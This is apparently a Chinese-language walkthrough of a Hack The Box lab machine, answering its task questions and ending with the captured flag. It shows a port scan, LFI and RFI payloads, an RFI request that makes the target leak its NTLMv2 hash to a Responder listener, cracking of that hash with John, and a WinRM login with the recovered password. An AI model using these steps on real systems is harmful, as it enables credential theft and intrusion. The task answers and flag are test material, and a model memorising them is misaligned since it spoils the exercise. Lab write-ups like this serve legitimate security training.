相关资料
Q:How many TCP ports are open on the machine?
┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p1-65535 10.129.42.95
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 16:12 CST
Nmap scan report for 10.129.42.95
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open wsman
7680/tcp open pando-pub
Nmap done: 1 IP address (1 host up) scanned in 790.35 seconds
很多命令都可以扫描端口号,不一定非要这一个,如果去掉其他的相关扫描能够节省更多时间
A:3
Task 2
Q:When visiting the web service using the IP address, what is the domain that we are being redirected to?
直接打开访问,看重定向到哪里了
A:unika.htb
Task 3
Q:Which scripting language is being used on the server to generate webpages?
抓包,然后查看response,返回了版本信息
也可以通过在hosts文件中添加解析信息,这样就不会重定向后找不到IP地址
A:php
Task 4
Q:What is the name of the URL parameter which is used to load different language versions of the webpage?
随便点一个,要提交的参数
A:page
Task 5
Q:Which of the following values for the page
parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
问哪个是本地文件包含
A:../../../../../../../../windows/system32/drivers/etc/hosts
Task 6
Q:Which of the following values for the page
parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
问哪个是远程包含
A://10.10.14.6/somefile
Task 7
Q:What does NTLM stand for?
NTLM是Microsoft创建的认证协议的集合。它是一种质询-响应身份验证协议,用于将客户端认证为Active Directory域中的资源
A:New Technology LAN Manager
Task 8
Q:Which flag do we use in the Responder utility to specify the network interface?
Responder工具
A:-I
Task 9
Q:There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john
, but the full name is what?.
用来破解hash的,这个得尝试用一用responser康康
A:john the ripper
Task 10
Q:What is the password for the administrator user?
先启动responser
监听本地tun0
网卡
┌──(root💀kali)-[~]
└─# responder -I tun0 1 ⨯
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.7.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.86]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-BEA716J9KXD]
Responder Domain Name [HALN.LOCAL]
Responder DCE-RPC Port [47831]
[+] Listening for events...
访问unika.htb/?page=//10.10.14.6/somefile
让他远程包含本地文件,这样他会回访我们,就会被拦截到hash
[+] Listening for events...
[ON]
[SMB] NTLMv2-SSP Client : 10.129.42.95
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:c0c8045502c4f5c9:3BC1DBA1408AC8C9983028A14C1D4BAD:010100000000000080A1D5FFB460D8019D88C898C17C526F000000000200080032004F003100440001001E00570049004E002D005800570056003200510039003600370052004100340004003400570049004E002D00580057005600320051003900360037005200410034002E0032004F00310044002E004C004F00430041004C000300140032004F00310044002E004C004F00430041004C000500140032004F00310044002E004C004F00430041004C000700080080A1D5FFB460D80106000400020000000800300030000000000000000100000000200000C87CC66EFD81FD5B28F598D5ABF20A35198A4161CBD14CF93DB63F66F81482FB0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000
[*] Skipping previously captured hash for RESPONDER\Administrator
然后新建一个文件,把第7行的hash存进去,用john
破解,时间比较长
┌──(root💀kali)-[~/桌面]
└─# john 1
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
奶奶的跑了两个小时还没跑出来
A:badminton
Task 11
Q:We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
利用的是5985端口上的wsman远程处理
A:5985
Flag
安装evil-winrm
工具
┌──(root💀kali)-[~]
└─# gem install evil-winrm
使用破解的密码连上去
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.129.42.95 -u Administrator -p badminton
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
查看flag
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../../mike
*Evil-WinRM* PS C:\Users\mike> dir
Directory: C:\Users\mike
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2022 4:51 AM Desktop
*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir
Directory: C:\Users\mike\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2022 4:50 AM 32 flag.txt
*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
flag:ea81b7afddd03efaa0945333ed147fac